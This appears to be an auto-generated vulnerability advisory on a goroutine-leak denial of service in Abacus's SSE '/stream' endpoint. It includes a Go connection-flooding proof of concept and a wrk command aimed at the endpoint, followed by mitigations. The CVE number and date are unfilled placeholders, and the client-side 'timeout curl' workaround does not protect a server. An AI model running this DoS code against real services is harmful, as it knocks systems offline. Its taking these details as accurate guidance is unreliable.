Abacus, Goroutine Leak, CVE-XXXX-XXXX (Critical)

How the CVE Works:

The vulnerability arises in Abacus’s Server-Sent Events (SSE) implementation due to improper handling of client disconnections. When a client disconnects from the `/stream` endpoint, the server fails to clean up the associated goroutines and channels. This results in blocked goroutines that remain in memory indefinitely, leading to resource exhaustion. Over time, the server’s memory usage stabilizes at a high level, preventing new SSE connections while other endpoints remain functional. The issue is exacerbated in high-traffic environments where frequent client connections and disconnections occur, causing a denial of service for SSE functionality.

DailyCVE Form:

Platform: Abacus

Version: < v1.4.0

Vulnerability: Goroutine leak

Severity: Critical

Date: YYYY-MM-DD

What Undercode Says:

Exploitation:

1. Exploit Code:

package main

import (
    "net/http"
    "time"
)

func main() {
    for {
        go func() {
            // open an SSE connection, hold it briefly, then drop it
            resp, err := http.Get("http://target/stream")
            if err != nil {
                return
            }
            defer resp.Body.Close()
            time.Sleep(1 * time.Second)
        }()
        time.Sleep(100 * time.Millisecond)
    }
}

This script repeatedly connects to and disconnects from the `/stream` endpoint, triggering the goroutine leak.

2. Exploit Command:

Use a load testing tool like `wrk` to simulate high traffic:

wrk -t10 -c100 -d60s http://target/stream

3. Detection:

Monitor memory usage and goroutine count:

curl http://target/debug/pprof/goroutine?debug=2

Protection:

1. Upgrade:

Upgrade to Abacus v1.4.0 or later.

2. Workaround Commands:

  • Limit concurrent connections per client using Nginx (the `limit_conn` directive needs a zone declared in the `http {}` context):
    limit_conn_zone $binary_remote_addr zone=addr:10m;   # http {} context
    location /stream {
        proxy_pass http://abacus;
        proxy_set_header Connection "";
        proxy_http_version 1.1;
        proxy_buffering off;
        limit_conn addr 100;
    }

  • Set timeouts:
    timeout 300 curl http://target/stream
    

3. Monitoring:

Use Prometheus to track memory and goroutine metrics:

- job_name: 'abacus'
  static_configs:
    - targets: ['target:9090']

4. Restart Script:

Schedule regular restarts using cron:

0 */6 * * * systemctl restart abacus

By following these steps, you can exploit, detect, and protect against this critical vulnerability.

References:

Reported By: https://github.com/advisories/GHSA-vh64-54px-qgf8